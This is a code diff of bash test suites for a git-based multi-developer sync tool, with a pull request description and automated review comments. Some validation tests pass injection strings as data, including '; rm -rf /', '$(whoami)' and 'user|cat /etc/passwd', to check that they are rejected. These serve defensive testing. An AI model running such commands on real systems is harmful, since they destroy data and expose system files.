+  local ta_count
+  ta_count="$(printf '%s' "$output" | jq '.team_activity | length' 2>/dev/null || echo '0')"
+  assert_eq "team_activity has 2 entries" "2" "$ta_count"
+
+  teardown
+}
+
+# ── Test: JSON mode empty team_activity when no other devs ──
+
+test_json_mode_empty_when_no_other_devs() {
+  echo "TEST: JSON mode has empty team_activity when no other devs"
+  setup
+  # Only local dev entry
+  populate_local_dev_entry
+
+  local output
+  output="$(BD_CMD="$TEST_TMP/mock-bin/bd" GIT_CMD="$TEST_TMP/mock-bin/git" bash "$SUT" --json 2>/dev/null)" || true
+
+  local ta_count
+  ta_count="$(printf '%s' "$output" | jq '.team_activity | length' 2>/dev/null || echo '0')"
+  assert_eq "team_activity empty for solo dev" "0" "$ta_count"
+
+  teardown
+}
+
+# ── Test: "No overlaps with your work" shown when no module overlap ──
+
+test_no_overlaps_message() {
+  echo "TEST: 'No overlaps' shown when other dev works on different modules"
+  setup
+  populate_other_dev_entries
+  populate_local_dev_entry
+
+  local output
+  output="$(BD_CMD="$TEST_TMP/mock-bin/bd" GIT_CMD="$TEST_TMP/mock-bin/git" NO_COLOR=1 bash "$SUT" 2>/dev/null)" || true
+
+  # dev-c works on docs/ — localdev works on src/lib/ — no overlap
+  assert_contains "no overlaps message" "No overlaps" "$output"
+
+  teardown
+}
+
+# ── Run all tests ─────────────────────────────────────────────────────────
+
+echo "=== smart-status-crossdev.sh test suite ==="
+echo ""
+
+test_team_activity_section_appears
+test_current_dev_excluded
+test_overlap_warning_format
+test_staleness_shown
+test_no_section_when_empty
+test_no_section_when_only_local_dev
+test_json_mode_includes_team_activity
+test_json_mode_empty_when_no_other_devs
+test_no_overlaps_message
+
+echo ""
+echo "=== Results: $PASS passed, $FAIL failed ==="
+
+if [[ $FAIL -gt 0 ]]; then
+  exit 1
+fi
+exit 0

--- a/tests/sync-utils.test.sh
+++ b/tests/sync-utils.test.sh
@@ -1,0 +1,440 @@
+#!/usr/bin/env bash
+# sync-utils.test.sh — Tests for sync-utils.sh session identity utility.
+#
+# Usage: bash tests/sync-utils.test.sh
+# Exit code 0 = all pass, non-zero = failure.
+
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/.." && pwd)"
+
+# ── Test framework ─────────────────────────────────────────────────────
+
+PASS=0
+FAIL=0
+
+assert_eq() {
+  local label="$1" expected="$2" actual="$3"
+  if [[ "$expected" == "$actual" ]]; then
+    echo "  PASS: $label"
+    PASS=$((PASS + 1))
+  else
+    echo "  FAIL: $label"
+    echo "    expected: '$expected'"
+    echo "    actual:   '$actual'"
+    FAIL=$((FAIL + 1))
+  fi
+}
+
+assert_match() {
+  local label="$1" pattern="$2" actual="$3"
+  if [[ "$actual" =~ $pattern ]]; then
+    echo "  PASS: $label"
+    PASS=$((PASS + 1))
+  else
+    echo "  FAIL: $label"
+    echo "    pattern:  '$pattern'"
+    echo "    actual:   '$actual'"
+    FAIL=$((FAIL + 1))
+  fi
+}
+
+assert_fail() {
+  local label="$1"
+  shift
+  if "$@" 2>/dev/null; then
+    echo "  FAIL: $label (expected failure, got success)"
+    FAIL=$((FAIL + 1))
+  else
+    echo "  PASS: $label"
+    PASS=$((PASS + 1))
+  fi
+}
+
+# ── Source the module under test ───────────────────────────────────────
+
+source "$REPO_ROOT/scripts/sync-utils.sh"
+
+# ── Tests: get_session_identity ────────────────────────────────────────
+
+echo "=== get_session_identity ==="
+
+# Test 1: Returns a non-empty string
+identity="$(get_session_identity)"
+if [[ -n "$identity" ]]; then
+  echo "  PASS: returns non-empty string"
+  PASS=$((PASS + 1))
+else
+  echo "  FAIL: returns non-empty string (got empty)"
+  FAIL=$((FAIL + 1))
+fi
+
+# Test 2: Format matches allowed characters (OWASP A03)
+assert_match "identity matches ^[a-zA-Z0-9._@+-]+$" \
+  '^[a-zA-Z0-9._@+-]+$' "$identity"
+
+# Test 3: Contains @ separator (email@hostname format)
+assert_match "identity contains @ separator" '@' "$identity"
+
+# ── Tests: validate_session_identity ───────────────────────────────────
+
+echo ""
+echo "=== validate_session_identity ==="
+
+# Test 4: Valid identities accepted
+validate_session_identity "user@hostname" && {
+  echo "  PASS: accepts user@hostname"
+  PASS=$((PASS + 1))
+} || {
+  echo "  FAIL: accepts user@hostname"
+  FAIL=$((FAIL + 1))
+}
+
+validate_session_identity "first.last+tag@My-Host" && {
+  echo "  PASS: accepts first.last+tag@My-Host"
+  PASS=$((PASS + 1))
+} || {
+  echo "  FAIL: accepts first.last+tag@My-Host"
+  FAIL=$((FAIL + 1))
+}
+
+validate_session_identity "a@b" && {
+  echo "  PASS: accepts minimal a@b"
+  PASS=$((PASS + 1))
+} || {
+  echo "  FAIL: accepts minimal a@b"
+  FAIL=$((FAIL + 1))
+}
+
+# Test 5: Injection strings rejected
+assert_fail "rejects semicolon injection" \
+  validate_session_identity "; rm -rf /"
+
+assert_fail "rejects command substitution \$()" \
+  validate_session_identity "\$(whoami)"
+
+assert_fail "rejects backtick injection" \
+  validate_session_identity '`whoami`'
+
+assert_fail "rejects pipe injection" \
+  validate_session_identity "user|cat /etc/passwd"
+
+assert_fail "rejects space in identity" \
+  validate_session_identity "user name@host"
+
+assert_fail "rejects empty string" \
+  validate_session_identity ""
+
+assert_fail "rejects slash injection" \
+  validate_session_identity "user/../../etc@host"
+
+# ── Tests: fallback when email not set ─────────────────────────────────
+
+echo ""
+echo "=== fallback behavior ==="
+
+# Test 6: Function uses git config (smoke test — just verify it runs)
+# The actual fallback logic is tested by checking the function exists
+# and returns a valid format. Full isolation would require mocking git,
+# which is out of scope for shell tests.
+type get_session_identity &>/dev/null && {
+  echo "  PASS: get_session_identity function exists"
+  PASS=$((PASS + 1))
+} || {
+  echo "  FAIL: get_session_identity function not found"
+  FAIL=$((FAIL + 1))
+}
+
+# ── Setup temp directory for git-based tests ──────────────────────────
+
+TMPDIR_ROOT="$(mktemp -d)"
+cleanup() {
+  rm -rf -- "$TMPDIR_ROOT"
+}
+trap cleanup EXIT
+
+# Helper: create a bare remote repo and a clone with a given default branch
+# Usage: setup_git_repo <dir_name> <default_branch>
+# Sets REPO_DIR to the clone path
+setup_git_repo() {
+  local dir_name="$1"
+  local default_branch="$2"
+  local bare_dir="$TMPDIR_ROOT/${dir_name}_bare"
+  local clone_dir="$TMPDIR_ROOT/${dir_name}"
+
+  # Create bare repo
+  git init --bare -- "$bare_dir" >/dev/null 2>&1
+
+  # Clone it
+  git clone -- "$bare_dir" "$clone_dir" >/dev/null 2>&1
+
+  # Create initial commit on the desired branch
+  git -C "$clone_dir" checkout -b "$default_branch" >/dev/null 2>&1
+  echo "init" > "$clone_dir/README.md"
+  git -C "$clone_dir" add -- README.md >/dev/null 2>&1
+  git -C "$clone_dir" commit -m "init" >/dev/null 2>&1
+  git -C "$clone_dir" push -u origin "$default_branch" >/dev/null 2>&1
+
+  # Set origin HEAD to point at the default branch
+  git -C "$bare_dir" symbolic-ref HEAD "refs/heads/$default_branch" >/dev/null 2>&1
+  # Update symbolic-ref on clone side
+  git -C "$clone_dir" remote set-head origin "$default_branch" >/dev/null 2>&1
+
+  REPO_DIR="$clone_dir"
+}
+
+# ── Tests: get_sync_branch ─────────────────────────────────────────────
+
+echo ""
+echo "=== get_sync_branch ==="
+
+# Test: Config JSON file takes priority
+echo ""
+echo "--- config.json priority ---"
+setup_git_repo "branch_config" "main"
+mkdir -p "$REPO_DIR/.beads"
+echo '{"sync_branch": "beads-sync"}' > "$REPO_DIR/.beads/config.json"
+result="$(
+  unset BD_SYNC_BRANCH 2>/dev/null || true
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_branch "$REPO_DIR"
+)"
+assert_eq "config.json sync_branch takes priority" "beads-sync" "$result"
+
+# Test: Env var overrides when no config
+echo ""
+echo "--- env var fallback ---"
+setup_git_repo "branch_env" "main"
+result="$(
+  export BD_SYNC_BRANCH="env-branch"
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_branch "$REPO_DIR"
+)"
+assert_eq "BD_SYNC_BRANCH env var used when no config" "env-branch" "$result"
+
+# Test: git symbolic-ref fallback detects develop
+echo ""
+echo "--- symbolic-ref fallback ---"
+setup_git_repo "branch_symref" "develop"
+result="$(
+  unset BD_SYNC_BRANCH 2>/dev/null || true
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_branch "$REPO_DIR"
+)"
+assert_eq "symbolic-ref detects 'develop'" "develop" "$result"
+
+# Test: Detects 'main' branch via symbolic-ref
+echo ""
+echo "--- symbolic-ref detects main ---"
+setup_git_repo "branch_main" "main"
+result="$(
+  unset BD_SYNC_BRANCH 2>/dev/null || true
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_branch "$REPO_DIR"
+)"
+assert_eq "symbolic-ref detects 'main'" "main" "$result"
+
+# Test: Detects 'master' branch via symbolic-ref
+echo ""
+echo "--- symbolic-ref detects master ---"
+setup_git_repo "branch_master" "master"
+result="$(
+  unset BD_SYNC_BRANCH 2>/dev/null || true
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_branch "$REPO_DIR"
+)"
+assert_eq "symbolic-ref detects 'master'" "master" "$result"
+
+# Test: Fallback to 'main' when symbolic-ref unavailable
+echo ""
+echo "--- fallback to main ---"
+setup_git_repo "branch_fallback_main" "main"
+git -C "$REPO_DIR" remote set-head origin --delete >/dev/null 2>&1
+result="$(
+  unset BD_SYNC_BRANCH 2>/dev/null || true
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_branch "$REPO_DIR"
+)"
+assert_eq "falls back to 'main' when it exists" "main" "$result"
+
+# Test: Fallback to 'master' when main absent
+echo ""
+echo "--- fallback to master ---"
+setup_git_repo "branch_fallback_master" "master"
+git -C "$REPO_DIR" remote set-head origin --delete >/dev/null 2>&1
+result="$(
+  unset BD_SYNC_BRANCH 2>/dev/null || true
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_branch "$REPO_DIR"
+)"
+assert_eq "falls back to 'master' when main absent" "master" "$result"
+
+# Test: Config YAML sync-branch field
+echo ""
+echo "--- config.yaml sync-branch ---"
+setup_git_repo "branch_yaml" "main"
+mkdir -p "$REPO_DIR/.beads"
+echo 'sync-branch: "yaml-sync-branch"' > "$REPO_DIR/.beads/config.yaml"
+result="$(
+  unset BD_SYNC_BRANCH 2>/dev/null || true
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_branch "$REPO_DIR"
+)"
+assert_eq "config.yaml sync-branch takes priority" "yaml-sync-branch" "$result"
+
+# Test: Config overrides env var
+echo ""
+echo "--- config overrides env ---"
+setup_git_repo "branch_config_over_env" "main"
+mkdir -p "$REPO_DIR/.beads"
+echo '{"sync_branch": "from-config"}' > "$REPO_DIR/.beads/config.json"
+result="$(
+  export BD_SYNC_BRANCH="from-env"
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_branch "$REPO_DIR"
+)"
+assert_eq "config overrides env var" "from-config" "$result"
+
+# ── Tests: get_sync_remote ─────────────────────────────────────────────
+
+echo ""
+echo "=== get_sync_remote ==="
+
+# Test: Config file takes priority for remote
+echo ""
+echo "--- config remote priority ---"
+setup_git_repo "remote_config" "main"
+mkdir -p "$REPO_DIR/.beads"
+echo '{"sync_remote": "custom-remote"}' > "$REPO_DIR/.beads/config.json"
+result="$(
+  unset BD_SYNC_REMOTE 2>/dev/null || true
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_remote "$REPO_DIR"
+)"
+assert_eq "config.json sync_remote takes priority" "custom-remote" "$result"
+
+# Test: Env var overrides when no config for remote
+echo ""
+echo "--- env var remote ---"
+setup_git_repo "remote_env" "main"
+result="$(
+  export BD_SYNC_REMOTE="env-remote"
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_remote "$REPO_DIR"
+)"
+assert_eq "BD_SYNC_REMOTE env var used when no config" "env-remote" "$result"
+
+# Test: Detects 'upstream' remote for fork-based setups
+echo ""
+echo "--- upstream detection for forks ---"
+setup_git_repo "remote_fork" "main"
+local_upstream_bare="$TMPDIR_ROOT/remote_fork_upstream_bare"
+git init --bare -- "$local_upstream_bare" >/dev/null 2>&1
+git -C "$REPO_DIR" remote add upstream "$local_upstream_bare" >/dev/null 2>&1
+result="$(
+  unset BD_SYNC_REMOTE 2>/dev/null || true
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_remote "$REPO_DIR"
+)"
+assert_eq "detects 'upstream' remote for forks" "upstream" "$result"
+
+# Test: Defaults to 'origin' when no upstream
+echo ""
+echo "--- default origin ---"
+setup_git_repo "remote_default" "main"
+result="$(
+  unset BD_SYNC_REMOTE 2>/dev/null || true
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_remote "$REPO_DIR"
+)"
+assert_eq "defaults to 'origin' when no upstream" "origin" "$result"
+
+# Test: Config overrides env for remote
+echo ""
+echo "--- config overrides env remote ---"
+setup_git_repo "remote_config_over_env" "main"
+mkdir -p "$REPO_DIR/.beads"
+echo '{"sync_remote": "from-config"}' > "$REPO_DIR/.beads/config.json"
+result="$(
+  export BD_SYNC_REMOTE="from-env"
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_remote "$REPO_DIR"
+)"
+assert_eq "config overrides env var for remote" "from-config" "$result"
+
+# Test: YAML config for remote
+echo ""
+echo "--- yaml config remote ---"
+setup_git_repo "remote_yaml" "main"
+mkdir -p "$REPO_DIR/.beads"
+echo 'sync-remote: "yaml-remote"' > "$REPO_DIR/.beads/config.yaml"
+result="$(
+  unset BD_SYNC_REMOTE 2>/dev/null || true
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_remote "$REPO_DIR"
+)"
+assert_eq "config.yaml sync-remote takes priority" "yaml-remote" "$result"
+
+# ── Security tests for branch/remote ──────────────────────────────────
+
+echo ""
+echo "=== Security: branch/remote injection ==="
+
+# Test: Semicolon injection in config value is sanitized
+echo ""
+echo "--- semicolon injection ---"
+setup_git_repo "sec_injection" "main"
+mkdir -p "$REPO_DIR/.beads"
+echo '{"sync_branch": "safe; rm -rf /"}' > "$REPO_DIR/.beads/config.json"
+result="$(
+  unset BD_SYNC_BRANCH 2>/dev/null || true
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_branch "$REPO_DIR"
+)"
+case "$result" in
+  *";"*) assert_eq "injection sanitized (no semicolons)" "no-semicolon" "has-semicolon" ;;
+  *) assert_eq "injection sanitized (no semicolons)" "sanitized" "sanitized" ;;
+esac
+
+# Test: Backtick injection sanitized
+echo ""
+echo "--- backtick injection ---"
+setup_git_repo "sec_backtick" "main"
+mkdir -p "$REPO_DIR/.beads"
+printf '{"sync_branch": "safe`whoami`"}' > "$REPO_DIR/.beads/config.json"
+result="$(
+  unset BD_SYNC_BRANCH 2>/dev/null || true
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_branch "$REPO_DIR"
+)"
+case "$result" in
+  *'`'*) assert_eq "backtick injection sanitized" "no-backtick" "has-backtick" ;;
+  *) assert_eq "backtick injection sanitized" "sanitized" "sanitized" ;;
+esac
+
+# Test: Command substitution injection sanitized
+echo ""
+echo "--- command substitution injection ---"
+setup_git_repo "sec_cmdsub" "main"
+mkdir -p "$REPO_DIR/.beads"
+printf '{"sync_remote": "safe$(whoami)end"}' > "$REPO_DIR/.beads/config.json"
+result="$(
+  unset BD_SYNC_REMOTE 2>/dev/null || true
+  source "$REPO_ROOT/scripts/sync-utils.sh"
+  get_sync_remote "$REPO_DIR"
+)"
+case "$result" in
+  *'$('*) assert_eq "cmd substitution sanitized" "no-cmdsub" "has-cmdsub" ;;
+  *) assert_eq "cmd substitution sanitized" "sanitized" "sanitized" ;;
+esac
+
+# ── Summary ────────────────────────────────────────────────────────────
+
+echo ""
+echo "=== Results: $PASS passed, $FAIL failed ==="
+
+if [ "$FAIL" -gt 0 ]; then
+  exit 1
+fi
+exit 0


### PR DESCRIPTION
## Problem
Teams of 5+ developers running 2-3 parallel AI/human sessions each have zero visibility into what others are working on. Conflicts are discovered only at PR merge time, causing wasted effort, duplicate work, and painful merge conflicts.

## Root Cause
Beads + worktrees handle intra-developer coordination (within one laptop), but there is no cross-developer sync or conflict detection mechanism. Each developer works in isolation without knowing what modules/files others are touching.

## Fix
Adds a complete multi-developer session awareness layer to Forge:
- **Pluggable sync backend** (refs/branch/inline) — syncs beads data across developers via git
- **File index** (`.beads/file-index.jsonl`) — tracks which developer is working on which files/modules
- **Conflict detection** — module-level overlap warnings with file-level drill-down
- **Cross-dev visibility** in `/status` — "Team Activity" section showing all developers' work
- **Soft-block gates** on `/plan` and `/dev` entry — warns before entering conflicting areas
- **Auto-sync** at Forge command entry — pulls latest team state before every command

## Value
- 5 developers can now see what everyone is working on in real-time (via git sync)
- Conflict warnings before work begins, not after PR creation
- Works with any git branching strategy (trunk-based, git flow, forks)
- Zero new dependencies — pure bash scripts + existing beads CLI
- Backward-compatible — single-developer workflow unchanged

## Beads
Closes: forge-w69s
Epic: forge-qml5 (Multi-developer Forge workflow)

<details>
<summary>Implementation Details</summary>

### Test Coverage
- **136 new tests** across 5 shell test suites — all passing
- sync-utils.test.sh: 32 tests (identity, branch detection, config, security)
- file-index.test.sh: 48 tests (CRUD, LWW, tombstones, task parsing)
- conflict-detect.test.sh: 23 tests (overlaps, detail mode, staleness)
- smart-status-crossdev.test.sh: 14 tests (team activity, overlap warnings)
- auto-sync.test.sh: 19 tests (sync, staleness, failure handling)
- **2013 existing tests** — no regressions (9 pre-existing errors unchanged)

### Security Review
- OWASP A03 (Injection): All inputs validated with allowlist regex, `sanitize()` on config values, `jq --arg` for JSON construction, all variables quoted
- OWASP A04 (Insecure Design): Stale sync warnings (>15 min), non-blocking sync failures, JSONL append-only with LWW resolution
- OWASP A07 (Identification): Session identity as `email@hostname`, validated format
- OWASP A09 (Logging): Conflict overrides logged via `bd comments add`
- Full analysis: docs/plans/2026-03-22-multi-dev-awareness-owasp-analysis.md

### Design Doc
See: docs/plans/2026-03-22-multi-dev-awareness-design.md

### Decisions Log
See: docs/plans/2026-03-22-multi-dev-awareness-decisions.md
- 0 decision gates fired during /dev (plan quality: Excellent)

### Key Decisions
1. **Pluggable sync backends** — refs (default, invisible), branch, inline. Universal across git workflows
2. **File-level index over AST parsing** — JSONL with LWW resolution, zero dependencies
3. **Soft blocks over hard blocks** — warn but let developers proceed with confirmation
4. **Session identity as email@hostname** — portable, validated, no extra config
5. **Extend smart-status.sh** — reuse existing Tier 1/2 conflict detection for cross-dev

### New Files
- `scripts/sync-utils.sh` — sync backend, branch/remote detection, session identity, auto-sync
- `scripts/file-index.sh` — JSONL file index with LWW resolution
- `scripts/conflict-detect.sh` — module/file-level conflict detection
- 5 test files in `tests/`

### Modified Files
- `scripts/smart-status.sh` — Team Activity cross-dev section
- `.claude/commands/plan.md`, `dev.md`, `status.md` — soft-block gates + auto-sync
- `lib/detect-agent.js` — eliminated duplicate `_detectFromVSCodePaths` call
- 22 agent directory files synced via `sync-commands.js`

### Validation
- [x] Type check passing
- [x] Lint passing (0 errors, 0 warnings)
- [x] All tests passing (2013 + 136 new)
- [x] Security review completed (OWASP Top 10)

</details>

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- greptile_comment -->

<details><summary><h3>Confidence Score: 4/5</h3></summary>

- PR is safe to merge after addressing the empty-modules silent false-negative in file-index.sh and the raw-epoch warning in conflict-detect.sh.
- Five rounds of review have resolved all significant issues: injection vectors, exit-code ambiguity, infinite loops, timestamp parsing bugs, and jq version compatibility. The two remaining findings are P2 — one cosmetic (epoch formatting) and one defensive correctness edge case (all-filtered paths). No regressions in 2013+ existing tests, 136 new tests passing. Score reflects high confidence in correctness with two targeted, low-risk fixes remaining.
- scripts/file-index.sh (empty-modules false-negative) and scripts/conflict-detect.sh (raw-epoch warning) warrant a targeted look.
</details>


<!-- greptile_failed_comments -->
<details open><summary><h3>Comments Outside Diff (1)</h3></summary>

1. `scripts/smart-status.sh`, line 788-828 ([link](https://github.com/harshanandak/forge/blob/c82c7c8b9df516d3c94208433cf0eb6e35252e31/scripts/smart-status.sh#L788-L828)) 

   <a href="#"><img alt="P1" src="https://greptile-static-assets.s3.amazonaws.com/badges/p1.svg?v=7" align="top"></a> **`TEAM_ACTIVITY_JSON` loses `"[]"` fallback on jq failure in JSON output mode**

   `TEAM_ACTIVITY_JSON` is initialised to `"[]"` before the block, but the final assignment inside the `if` block is an unguarded command substitution:

   ```bash
   TEAM_ACTIVITY_JSON="$(printf '%s' "$_file_index_all" | jq -c ... '...')"
   ```

   If jq encounters a malformed entry from a collaborator's synced file index (e.g., an invalid `updated_at` causing `fromdateiso8601` to throw), the command substitution returns an empty string and `TEAM_ACTIVITY_JSON` is assigned `""` — silently discarding the `"[]"` default.

   In **text mode** this degrades gracefully (the `[ "" -gt 0 ]` comparison is false so the section is skipped), but in **JSON mode** the broken value propagates to:

   ```bash
   jq -n --argjson team_activity "$TEAM_ACTIVITY_JSON" ...
   ```

   `jq --argjson team_activity ""` fails with *"Invalid numeric literal at EOF"*, breaking the entire JSON output of `/status`.

   The fix is a simple `|| echo '[]'` fallback on both jq calls in the block:

   ```bash
   _my_modules="$(printf '%s' "$_file_index_all" | jq -c ... || echo '[]')"
   TEAM_ACTIVITY_JSON="$(printf '%s' "$_file_index_all" | jq -c ... || echo '[]')"
   ```

   <details><summary>Prompt To Fix With AI</summary>

   `````markdown
   This is a comment left during a code review.
   Path: scripts/smart-status.sh
   Line: 788-828

   Comment:
   **`TEAM_ACTIVITY_JSON` loses `"[]"` fallback on jq failure in JSON output mode**

   `TEAM_ACTIVITY_JSON` is initialised to `"[]"` before the block, but the final assignment inside the `if` block is an unguarded command substitution:

   ```bash
   TEAM_ACTIVITY_JSON="$(printf '%s' "$_file_index_all" | jq -c ... '...')"
   ```

   If jq encounters a malformed entry from a collaborator's synced file index (e.g., an invalid `updated_at` causing `fromdateiso8601` to throw), the command substitution returns an empty string and `TEAM_ACTIVITY_JSON` is assigned `""` — silently discarding the `"[]"` default.

   In **text mode** this degrades gracefully (the `[ "" -gt 0 ]` comparison is false so the section is skipped), but in **JSON mode** the broken value propagates to:

   ```bash
   jq -n --argjson team_activity "$TEAM_ACTIVITY_JSON" ...
   ```

   `jq --argjson team_activity ""` fails with *"Invalid numeric literal at EOF"*, breaking the entire JSON output of `/status`.

   The fix is a simple `|| echo '[]'` fallback on both jq calls in the block:

   ```bash
   _my_modules="$(printf '%s' "$_file_index_all" | jq -c ... || echo '[]')"
   TEAM_ACTIVITY_JSON="$(printf '%s' "$_file_index_all" | jq -c ... || echo '[]')"
   ```

   How can I resolve this? If you propose a fix, please make it concise.
   `````
   </details>
</details>

<!-- /greptile_failed_comments -->

<details><summary>Prompt To Fix All With AI</summary>

`````markdown
This is a comment left during a code review.
Path: scripts/conflict-detect.sh
Line: 84

Comment:
**Stale-check warning shows raw epoch integer**

`_check_stale_sync` embeds the raw Unix epoch (e.g. `1742664000`) directly in its warning:

```
WARNING: File index may be stale (last sync: 1742664000, 3600s ago > 900s threshold)
```

This is inconsistent with the fix applied to `check_sync_staleness` in `sync-utils.sh` (which now formats the elapsed time as `Xm ago`) and with the sync-failure warning fix in `auto_sync`. The stale check is the most developer-visible warning path (fires before every conflict check), so the raw epoch is especially confusing here.

```suggestion
    echo "WARNING: File index may be stale (last sync: ${diff}s ago > 900s threshold)" >&2
```

Or, to match the "Xm ago" style used elsewhere:

```bash
local mins=$(( diff / 60 ))
echo "WARNING: File index may be stale (last sync: ${mins}m ago > 15m threshold)" >&2
```

How can I resolve this? If you propose a fix, please make it concise.

---

This is a comment left during a code review.
Path: scripts/file-index.sh
Line: 308-332

Comment:
**High-confidence entry written with empty arrays when all paths are injection-filtered**

`confidence` is set to `"low"` only when the task file is missing or has no `File(s):` lines (lines 273–302). If `File(s):` lines exist but every extracted path is rejected by the injection filter (lines 309–312 — e.g. all paths start with `$(…)`), `raw_files` is non-empty so `confidence` stays `"high"`, but `sanitized_paths` remains empty. The subsequent `else` branch (line 329) sets `files_json="[]"` and `modules_json="[]"`, and `file_index_add` is called with those empty arrays.

The result is a `confidence: "high"` (implicit, no field written) entry with `files: []` and `modules: []`. Conflict detection will compare against `[]` and report no overlaps — silently producing a false-negative for any developer whose task-file paths all happen to trigger the injection guard.

Fix: if `sanitized_paths` is empty but `raw_files` was non-empty, treat this the same as the "no task file" fallback:

```bash
  # If all parsed paths were rejected by the injection filter, fall back
  if [[ ${#raw_files[@]} -gt 0 ]] && [[ -z "$sanitized_paths" ]]; then
    confidence="low"
  fi
```

Add this check after the sanitization loop (around line 317) and before the `if [[ -n "$sanitized_paths" ]]` branch.

How can I resolve this? If you propose a fix, please make it concise.
`````

</details>

<sub>Last reviewed commit: ["fix: tombstone close..."](https://github.com/harshanandak/forge/commit/9da6de231073743b324d4354972a1532f59b9db2)</sub>

> Greptile also left **2 inline comments** on this PR.

<!-- /greptile_comment -->